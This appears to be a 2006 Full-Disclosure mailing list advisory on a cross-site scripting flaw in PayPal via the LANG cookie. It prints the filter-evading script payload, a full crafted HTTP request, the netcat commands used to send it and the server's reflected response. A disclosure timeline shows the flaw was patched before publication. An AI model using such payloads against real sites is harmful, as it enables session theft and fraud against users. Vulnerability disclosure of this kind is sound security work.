[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <B3B115FC7FE39341A905B254C71697E5032E83EB@FBCMST05V04.fbc.local>
Date: Sat, 4 Nov 2006 20:39:02 +0100
From: <corrado.liotta@...ce.it>
To: <full-disclosure@...ts.grok.org.uk>
Subject: [x0n3-h4ck.org] PayPal vulnerable to XSS
-=[--------------------ADVISORY-------------------]=-
PayPal.com
Author:CorryL x0n3-h4ck.org
-=[----------------------------------------------------]=-
-=[+] Application: PayPal.com
-=[+] Version:
-=[+] Vendor's URL: www.paypal.com
-=[+] Platform: Linux\Unix
-=[+] Bug type: XSS
-=[+] Exploitation: Remote/Local
-=[-]
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference: www.x0n3-h4ck.org
-=[+] Virtual Office: http://www.kasamba.com/CorryL
..::[ Descriprion ]::..
Founded in 1998, PayPal, an eBay Company, enables any individual or business with an email address to securely, easily and quickly send and receive payments online. PayPal's service builds on the existing financial infrastructure of bank accounts and credit cards and utilizes the world's most advanced proprietary fraud prevention systems to create a safe, global, real-time payment solution.
PayPal has quickly become a global leader in online payment solutions with 100 million account members worldwide. Available in 103 countries and regions around the world, buyers and sellers on eBay, online retailers, online businesses, as well as traditional offline businesses are transacting with PayPal.
..::[ Proof Of Concept ]::..
The problem is in a contained variable on the cookies that come
saved on a system client,
I have used a small software "NetCat" for the dispatch of the application
to the web containing server the lace,
what it would allow the xss.
I have used a line of code that visualizes a small window of
containing alert of the numbers.
<ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>
I have passed to the varying LANG in this way:
LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>
this is a request, that I have passed server to the web, complete of the
code that would allow the xss:
GET / HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
Host: www.paypal.com
Cookie:
cookie_check=yes;feel_cookie=6120302020622030202063203620776562736372206
4203020206520323120686F6D65706167652F486F6D65506167652E78736C20662030202
067203520656E5F55532068203020206920313920702F77656C2F696E6465782D6F75747
3696465206A203020206B2031362057656C636F6D65202D2050617950616C206C2030202
0;Apache=87%2E18%2E96%2E17%2E100421159849159546;KHcl0EuY7AKSMgfvHl7J5E7h
PtK=3pnRPwTbH4N6EEpxzwWWs3Mc2y2H-hH53D2MVeXyVDl4MsVrDF4cjRE3XSmD3RB714PL
N69ovbjK--4R;HaC80bwXscjqZ7KM6VOxULOB534=111-222-1933email@...ress.com;p
pip_signup=1;LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>;7aMa
j2jiaNMgvUAKlwbL1LlbnqC=BCRwX6rFzy8UFpNf7im0msjTqBkC71Yeq3U8IKjQG4zGrhRy
i5YDJ7sCXUdmJRHDye3Pjm;fL2JBKjxujhcE4LvqIWvGu9H2DC=r-h3XHZ9sxeAYLHHkSjI4
rXDaIB_JYsnEcx5svkMqiEPXWXCIaM-O-gNRkcj1K4tS5pPr4xtYC_3hZUBCMQ6b4xw8Tm;t
est_cookie=CheckForPermission;HumanClickID=-1902375092086;HumanClickACTI
VE=1159849210089;HumanClickKEY=2113911440409354850;BEGINREJECT=115984951
1214ENDREJECT
Connection: Close
Pragma: no-cache
following I glue the answer of the server:
nc www.paypal.com 80 < prova.txt
HTTP/1.1 200 OK
Date: Fri, 06 Oct 2006 17:23:13 GMT
Server: Apache/1.3.33 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.22
OpenSSL/0.9.7e
Cache-Control: private
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Pragma: no-cache
Set-Cookie:
feel_cookie=61203020206220302020632036207765627363722064203620776562
736372206520323120686F6D65706167652F486F6D65506167652E78736C20662032312
0686F6D65
706167652F486F6D65506167652E78736C2067203431202D2D3E3C536352695074200A0
D3E616C65
72742831323334353637383930293B3C2F5363526950743E2068203520656E5F5553206
920313920
702F77656C2F696E6465782D6F757473696465206A20313920702F77656C2F696E64657
82D6F7574
73696465206B203020206C2031362057656C636F6D65202D2050617950616C20;
expires=Sat, 0
6-Oct-2007 17:23:14 GMT; path=/; domain=.paypal.com
Set-Cookie: Apache=87.18.110.213.321561160155393836; path=/;
expires=Sun, 28-Sep
-36 17:23:13 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<!--
Script info: script: webscr, cmd: , template: p/wel/index-outside,
date: Oct.
3, 2006 12:18:04 PDT; country: US, language: --><ScRiPt>alert(1234567890);</ScRiPt>
web version: 42.0-255538 branch: live-420_int
content version: 42.0-249796 branch: live-420_int
-->
<title>PayPal - Abort</title>
As he is able well to see the server responds and it inserts the line of
code among the output of the page, allowing the opening
of the window of alert.
We can save the answer of the server on a page in formed html
and to open her/it with an any browsers to ascertain how much I dictate,
using same NetCat, in this way:
nc www.paypal.com 80 < test.txt > aaa.html
..::[ Disclousure Timeline ]::..
[04/10/2006] - Vendor notification
[08/10/2006] - Vendor Response
[18/10/2006] - Patch relase from vendor
[04/11/2006] - Public disclousure
*********************
Alice BASIC: mail, antivirus, antispam e invio allegati fino a 2 GB!
Per maggiori informazioni vai su: http://adsl.alice.it/servizi/alicebasic.html
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists